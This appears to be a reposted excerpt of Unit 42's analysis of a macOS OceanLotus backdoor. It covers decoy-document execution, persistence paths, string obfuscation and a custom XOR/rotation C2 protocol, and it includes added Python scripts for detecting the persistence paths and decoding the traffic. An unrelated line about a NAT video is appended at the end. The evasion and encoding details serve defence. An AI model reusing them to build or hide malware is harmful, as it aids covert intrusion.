Once the application bundle is launched, it opens a hidden file in the bundle's Resources folder named .CFUserEncoding, which is a password-protected Word document (see Figure 2). After persistence has been set up, it also copies this file to the executable path, essentially replacing the application bundle. This leads the victim to believe nothing is amiss: they thought they were opening a Word document, and a Word document opened. In this case, the Word file is named "Noi dung chi tiet.docx", which is Vietnamese for "Details."
Figure 2. Decoy document prompts for a password to open the file.
Compared to the previous version of this backdoor, the persistence mechanism remains largely the same. This version creates a Launch Agent that runs when the victim host starts up, whereas in the previous version execution occurred when a user logged in. It also copies itself to a different location and filename based on the UID of the user who ran the application.
For a user other than root, it takes the MD5 hash of the structure returned by getpwuid() and breaks the hash into segments: <first 8 chars of hash>-<next 16 chars of hash>-<last 8 chars of hash>. This segmented MD5 hash is prepended with "0000-" and used as a directory name under ~/Library/OpenSSL/ to store the executable file (see Figure 3). If the user is root, the executable is stored in the system-wide library directory at /Library/TimeMachine/bin/mtmfs.
It is interesting to note that the executable and plist locations mimic the paths of legitimate applications.
Figure 3. plist and executable names and locations based on UID
Once the malware has set up persistence, it deletes the application bundle from the executable path leaving the decoy document in its place and launches itself as a service from the new location.
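The persistence layout described above can be hunted for directly. The following is an added example, not Unit 42's code: it builds the directory name from a 32-character MD5 digest the way the article describes (8-16-8 split, prefixed with "0000-") and flags paths that match that shape under Library/OpenSSL/ or the root-only /Library/TimeMachine/bin/mtmfs location. It does not recompute the MD5 of the getpwuid() structure, since the exact bytes hashed are not given on the page; the sample paths are constructed, not taken from an infected host.

```python
"""Hunt for OceanLotus-style persistence paths (added example, not Unit 42 code)."""
import os
import re
from typing import Iterable, List

# Shape of the per-user directory: 0000-<8 hex>-<16 hex>-<8 hex>
SEGMENTED_MD5 = re.compile(r"^0000-[0-9a-f]{8}-[0-9a-f]{16}-[0-9a-f]{8}$")
# Location used when the malware runs as root
ROOT_PATH = "/Library/TimeMachine/bin/mtmfs"


def segmented_dir_name(md5_hex: str) -> str:
    """Build the directory name from a 32-char MD5 hex digest as described:
    first 8 chars, next 16 chars, last 8 chars, prefixed with '0000-'."""
    h = md5_hex.lower()
    if len(h) != 32 or any(c not in "0123456789abcdef" for c in h):
        raise ValueError("expected a 32-character hex MD5 digest")
    return f"0000-{h[:8]}-{h[8:24]}-{h[24:]}"


def is_suspicious_path(path: str) -> bool:
    """True for the root install path or any file under
    .../Library/OpenSSL/<segmented-md5>/ (the per-user layout)."""
    norm = os.path.normpath(path)
    if norm == ROOT_PATH:
        return True
    parts = norm.split(os.sep)
    for i in range(len(parts) - 2):
        if (parts[i] == "Library" and parts[i + 1] == "OpenSSL"
                and SEGMENTED_MD5.match(parts[i + 2])):
            return True
    return False


def find_suspicious(paths: Iterable[str]) -> List[str]:
    """Filter an iterable of paths (e.g. from a file inventory) down to hits."""
    return [p for p in paths if is_suspicious_path(p)]


def scan_live_host(home: str = os.path.expanduser("~")) -> List[str]:
    """Check the current user's ~/Library/OpenSSL and the root path on a live macOS host."""
    hits: List[str] = []
    base = os.path.join(home, "Library", "OpenSSL")
    if os.path.isdir(base):
        hits.extend(os.path.join(base, n) for n in os.listdir(base)
                    if SEGMENTED_MD5.match(n))
    if os.path.exists(ROOT_PATH):
        hits.append(ROOT_PATH)
    return hits


# Constructed sample inventory: benign OpenSSL files, one wrongly-shaped name,
# one correctly-shaped per-user install, and the root install path.
SAMPLE_PATHS = [
    "/Users/alice/Library/OpenSSL/0000-0123456789abcdef0123456789abcdef/stub",  # no segment dashes
    "/Users/alice/Library/OpenSSL/"
    + segmented_dir_name("0123456789abcdef0123456789abcdef") + "/stub",
    "/Library/TimeMachine/bin/mtmfs",
    "/usr/local/lib/libssl.dylib",
    "/Users/alice/Library/OpenSSL/certs/ca.pem",
]

if __name__ == "__main__":
    for p in find_suspicious(SAMPLE_PATHS):
        print("suspicious:", p)
    for p in scan_live_host():
        print("on this host:", p)
```

The regex is deliberately strict about the dash positions: a directory named with a bare 32-character hash does not match, which keeps false positives from other software that happens to store hashed names under Library/OpenSSL.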
No Command Line Utilities
One of the first things we noticed about this backdoor is the lack of suspicious strings, which often provide context on what malware might do on a victim host. Most macOS malware calls the system() or exec() functions to run additional scripts. Here, those calls were absent, as were command line utility strings that would easily convey the malicious intent of the application. This shows a deep understanding of the macOS platform on the part of the author, compared to other threat actors who commonly copy and paste scripts from the Internet.
The absence of these strings may also double as an anti-analysis technique, making the malware seem less suspicious, especially to basic static analysis.
String Decoding
Since there appear to be no obvious suspicious strings in plaintext, we move onto the possibility of use of encoded, or obfuscated strings.
The string decode routine in this backdoor is an upgrade over previous versions, in which strings were XOR encoded with the word "Variable" as the key. The decode routine now combines bit shifting with XOR operations using a variable key derived from the length of the encoded string. If the computed XOR key turns out to be 0, a default key of 0x1B is used. Figure 4 shows a Python implementation of the decode function.
Figure 4. Python implementation of the malware's string decode function.
After decoding the strings (see Figure 5), we can glean that the malware sets up persistence, surveys the victim’s computer, and sends this information back to a server. At this point, it is still not obvious that this malware contains backdoor functionality.
Figure 5. List of decoded strings.
Custom Binary Protocol and Encrypted Traffic
The threat actors responsible for this malware appear to have spent real effort developing their own communication protocol. Rather than standing up an off-the-shelf web server as a command and control server, as is commonly done, they built their own command and control mechanism.
The backdoor uses a custom binary protocol on TCP port 443, a well-known port that is unlikely to be blocked by traditional firewalls because of its use for HTTPS. The packet shown in Figure 6 is encoded with a combination of bit shifting (see Figure 7) and XOR with a key of 0x1B before it is sent; the bits are always rotated left by three positions before the XOR operation. This is an improvement over the previous version, where the packet was only XOR encoded with a key of 0x1B.
Get the rest of the Unit 42 research and solutions here: https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/
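To make the packet transform concrete, here is an added example (not Unit 42's code) that implements both the old and new encodings so an analyst can decode captured traffic with each and see which produces readable output. It reads the description above as an 8-bit, per-byte rotate left by three followed by XOR with 0x1B for the new version, and plain XOR with 0x1B for the previous one; that per-byte reading and the sample payload are this example's assumptions, not details confirmed on the page.

```python
"""Encode/decode the OceanLotus C2 byte transform as described (added example)."""
KEY = 0x1B   # XOR key shared by both versions
ROT = 3      # bit rotation used by the new version


def rol8(b: int, n: int) -> int:
    """Rotate an 8-bit value left by n bits."""
    n %= 8
    return ((b << n) | (b >> (8 - n))) & 0xFF


def ror8(b: int, n: int) -> int:
    """Rotate an 8-bit value right by n bits (inverse of rol8)."""
    n %= 8
    return ((b >> n) | (b << (8 - n))) & 0xFF


def encode_v2(data: bytes) -> bytes:
    """New version: rotate each byte left by 3, then XOR with 0x1B."""
    return bytes(rol8(b, ROT) ^ KEY for b in data)


def decode_v2(data: bytes) -> bytes:
    """Undo encode_v2: XOR first, then rotate right by 3."""
    return bytes(ror8(b ^ KEY, ROT) for b in data)


def encode_v1(data: bytes) -> bytes:
    """Previous version: XOR with 0x1B only. XOR is its own inverse."""
    return bytes(b ^ KEY for b in data)


decode_v1 = encode_v1


def try_both(blob: bytes) -> dict:
    """Apply both decoders to a captured blob; the analyst picks the readable one."""
    return {"v1": decode_v1(blob), "v2": decode_v2(blob)}


def looks_printable(data: bytes, threshold: float = 0.9) -> bool:
    """Cheap heuristic for 'this decoded correctly': mostly printable ASCII."""
    if not data:
        return False
    printable = sum(1 for b in data if 0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D))
    return printable / len(data) >= threshold


# Constructed survey payload, not real C2 traffic.
SAMPLE_PLAINTEXT = b"hostname=victim-mac;user=alice;os=10.12"

if __name__ == "__main__":
    wire = encode_v2(SAMPLE_PLAINTEXT)
    print("on the wire:", wire.hex())
    for version, plain in try_both(wire).items():
        print(version, "readable" if looks_printable(plain) else "garbage", plain)
```

Because the two versions differ only in the rotation step, a packet that decodes to garbage with plain XOR 0x1B but to readable text after XOR and rotate-right-3 is a quick indicator that the newer variant is in play.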
This video demonstrates how to configure three types of Source NAT rules:
- Dynamic IP and Port
- Dynamic IP
- Static IP